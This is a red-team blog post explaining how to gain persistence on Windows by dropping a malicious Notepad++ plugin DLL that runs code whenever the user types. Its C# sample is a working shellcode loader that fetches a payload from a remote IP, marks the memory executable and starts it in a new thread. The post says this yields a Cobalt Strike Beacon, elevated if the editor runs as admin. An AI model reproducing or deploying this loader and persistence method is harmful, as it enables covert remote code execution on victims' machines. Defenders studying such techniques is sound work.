<!doctype html>
<html lang="en-us">
  <head>
    <title>Notepad&#43;&#43; Plugins for Persistence - Offensive Defence</title>
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.82.0" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="https://offensivedefence.co.uk/css/main.min.f90f5edd436ec7b74ad05479a05705770306911f721193e7845948fb07fe1335.css" />
    <script src="https://kit.fontawesome.com/89e1a73a2b.js" crossorigin="anonymous"></script>

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notepad&#43;&#43; Plugins for Persistence"/>
<meta name="twitter:description" content="Notepad&#43;&#43; is a popular Windows text editor, which has an extension capability in the way of plugins. The Plugin Manager allows users to download and install approved plugins, but you can also install your own plugins locally. A plugin can be built in a variety of languages including C&#43;&#43; and C#.
To install a custom plugin, the DLL can simply be dropped inside %PROGRAMFILES%\Notepad&#43;&#43;\plugins\pluginName\pluginName.dll. The up-side is that no user interaction is required to load or activate the plugin."/>

    <meta property="og:title" content="Notepad&#43;&#43; Plugins for Persistence" />
<meta property="og:description" content="Notepad&#43;&#43; is a popular Windows text editor, which has an extension capability in the way of plugins. The Plugin Manager allows users to download and install approved plugins, but you can also install your own plugins locally. A plugin can be built in a variety of languages including C&#43;&#43; and C#.
To install a custom plugin, the DLL can simply be dropped inside %PROGRAMFILES%\Notepad&#43;&#43;\plugins\pluginName\pluginName.dll. The up-side is that no user interaction is required to load or activate the plugin." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://offensivedefence.co.uk/posts/notepad&#43;&#43;/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2022-01-29T15:54:31&#43;00:00" />
<meta property="article:modified_time" content="2022-01-29T15:54:31&#43;00:00" />



  </head>
  <body>
    <header class="app-header">
      <a href="https://offensivedefence.co.uk"><img class="app-header-avatar" src="/avatar.png" alt="John Doe" /></a>
      <h1>Offensive Defence</h1>
      <p>&#34;The hand which strikes also blocks.&#34;</p>

    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">Notepad&#43;&#43; Plugins for Persistence</h1>
      <div class="post-meta">
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-link">
  <path d="M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71"></path>
  <path d="M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71"></path>
</svg>
              <a class="tag" href="https://offensivedefence.co.uk/authors/rastamouse/">Rasta Mouse</a>
        
      
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Jan 29, 2022
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          2 min read
        </div></div>
    </header>
    <div class="post-content">
      <p><a href="https://notepad-plus-plus.org/downloads/">Notepad++</a> is a popular Windows text editor, which has an extension capability in the way of <a href="https://npp-user-manual.org/docs/plugins/">plugins</a>.  The <strong>Plugin Manager</strong> allows users to download and install <a href="https://github.com/notepad-plus-plus/nppPluginList">approved</a> plugins, but you can also install your own plugins locally.  A plugin can be built in a variety of languages including <a href="https://github.com/npp-plugins/plugintemplate/releases">C++</a> and <a href="https://github.com/kbilsted/NotepadPlusPlusPluginPack.Net">C#</a>.</p>
<p>To install a custom plugin, the DLL can simply be dropped inside <code>%PROGRAMFILES%\Notepad++\plugins\pluginName\pluginName.dll</code>.  The up-side is that no user interaction is required to load or activate the plugin.  The down-side is that local admin rights are required to write to the directory.</p>
<p>Here, I&rsquo;m using the .NET template to run some code from the <code>OnNotification</code> method.  This is fired every time Notepad++ does &ldquo;something&rdquo;.  The notification code can be used by the plugin to determine whether or not it needs to do anything.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c#" data-lang="c#"><span style="color:#66d9ef">static</span> <span style="color:#66d9ef">bool</span> firstRun = <span style="color:#66d9ef">true</span>;

<span style="color:#66d9ef">public</span> <span style="color:#66d9ef">static</span> <span style="color:#66d9ef">void</span> OnNotification(ScNotification notification)
{
    <span style="color:#66d9ef">if</span> (notification.Header.Code == (<span style="color:#66d9ef">uint</span>)SciMsg.SCI_ADDTEXT &amp;&amp; firstRun)
    {
        <span style="color:#66d9ef">using</span> var process = Process.GetCurrentProcess();
        MessageBox.Show(<span style="color:#e6db74">$&#34;Hello from {process.ProcessName} ({process.Id}).&#34;</span>);

        firstRun = !firstRun;
    }
}
</code></pre></div><p>In this example, the <code>SCI_ADDTEXT</code> notification is used.  This is fires everytime the user types a character, but there are literally hundreds of notification types that you could use instead.  I like this approach, since it doesn&rsquo;t require the user to interact with a plugin menu item or anything like that.  I also add a boolean flag to ensure the &ldquo;malicious&rdquo; code is only run once.</p>
<p>Once compiled, create a new directory inside <code>plugins</code> and copy the DLL there.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">PS C:\&gt; ls &#39;C:\Program Files\Notepad++\plugins\TotallyLegitPlugin\&#39;

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        30/01/2022     10:22         164352 TotallyLegitPlugin.dll
</code></pre></div><p>Now launch Notepad++ and type a character.</p>
<p><img src="/images/notepad_plusplus/msgbox.png" alt="" title="MessageBox"></p>
<p>Replace the MessageBox with a shellcode loader or anything else you fancy.  This is the most basic example:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c#" data-lang="c#"><span style="color:#66d9ef">if</span> (notification.Header.Code == (<span style="color:#66d9ef">uint</span>)SciMsg.SCI_ADDTEXT &amp;&amp; firstRun)
{
    <span style="color:#66d9ef">using</span> var client = <span style="color:#66d9ef">new</span> WebClient();
    <span style="color:#66d9ef">var</span> buf = client.DownloadData(<span style="color:#e6db74">&#34;http://172.19.215.47/shellcode&#34;</span>);

    <span style="color:#66d9ef">var</span> hMemory = VirtualAlloc(
        IntPtr.Zero,
        (<span style="color:#66d9ef">uint</span>)buf.Length,
        AllocationType.Reserve | AllocationType.Commit,
        MemoryProtection.ReadWrite);

    Marshal.Copy(buf, <span style="color:#ae81ff">0</span>, hMemory, buf.Length);

    _ = VirtualProtect(
            hMemory,
            (<span style="color:#66d9ef">uint</span>)buf.Length,
            MemoryProtection.ExecuteRead,
            <span style="color:#66d9ef">out</span> _);

    _ = CreateThread(
            IntPtr.Zero,
            <span style="color:#ae81ff">0</span>,
            hMemory,
            IntPtr.Zero,
            <span style="color:#ae81ff">0</span>,
            <span style="color:#66d9ef">out</span> _);

    firstRun = !firstRun;
}
</code></pre></div><p><img src="/images/notepad_plusplus/beacon.png" alt="" title="Cobale Strike Beacon"></p>
<p>If Notepad++ is launched in high integrity (e.g. to modify a privileged system file such as <code>C:\Windows\System32\drivers\etc\hosts</code>), the Beacon will also run in high integrity.</p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
